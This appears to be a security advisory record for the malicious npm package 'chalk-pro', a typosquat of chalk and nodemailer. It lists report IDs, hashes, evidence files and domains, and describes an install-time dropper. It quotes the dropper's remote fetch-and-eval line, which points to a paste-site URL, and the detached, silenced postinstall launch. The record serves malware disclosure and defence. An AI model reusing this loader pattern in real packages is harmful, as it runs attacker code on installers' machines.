-= Per source details. Do not edit below this line.=-
Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.
{
"malicious-packages-origins": [
{
"versions": [
"7.0.4"
],
"sha256": "ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce",
"modified_time": "2026-06-12T20:36:57Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-006231",
"import_time": "2026-06-12T20:49:38.118064947Z"
},
{
"versions": [
"7.0.4"
],
"sha256": "d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070",
"modified_time": "2026-06-12T20:36:58Z",
"source": "amazon-inspector",
"import_time": "2026-06-12T20:49:38.195698931Z",
"id": "IN-MAL-2026-006232"
},
{
"versions": [
"7.0.6"
],
"sha256": "75bcaaf15fbc593bdf034886186f961d37758a21b9feca9c18c37338c8af34dc",
"modified_time": "2026-06-16T22:17:58Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-006840",
"import_time": "2026-06-16T23:03:43.140780104Z"
}
]
}{
"package_integrity": [
{
"filename": "chalk-pro-7.0.4.tgz",
"hashes": {
"sha512_sri": "sha512-m0gHULuyqRGU+Z2ZkyFuCDJD0YUUoENkKlzk5lY1tt97m7zFVP+79dhp4gTNtwyZ0orut7rgi+lEBNGNEWTmbg==",
"sha1": "fd1014b20c77e2d2b536d8dcef0187a949438318"
}
}
],
"evidence_files": [
{
"sha256": "1177ef44c40c048428ad64bebb0781fdf8ec303a3a4941c225efc143a54d0798",
"path": "lib/utils/smtp-connection/index.js",
"tlsh": "09e026a223e0612e223519e593060067b007c5616b6ae8c6c3585af226c1fd58e23df9"
},
{
"sha256": "9fb27c30f484650bb4a39f65a03fbccdc0b9b5f1cb84700ca73ee8893c66e06e",
"path": "lib/utils/index.js",
"tlsh": "dae0686a23533738a034cbc1da30ce3b258b8020b365a0e0f00c406a2bc72c406ea8da"
},
{
"sha256": "2b849087b5db4e7663811977e549e5cb0a76d2b3d36c1b8e0e845a45e835a6c4",
"path": "package.json",
"tlsh": "1041fc15cd268ce3279929edb86d0183b530d00f8d09b85db74c938c4f8e99f76b8a6d"
},
{
"sha256": "4aac106a4f36aba6433c7ded453d724307ee55616e240883cd46204549cf24b1",
"path": "lib/utils/smtp-connection/parse.js",
"tlsh": "7cf0a6802cb8fb900345b0e7c0bbeb07a198a068312287a48a8f9d5a45868488a130dd"
}
],
"domains": [
"github.com",
"release-assets.githubusercontent.com",
"www.jsonkeeper.com"
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]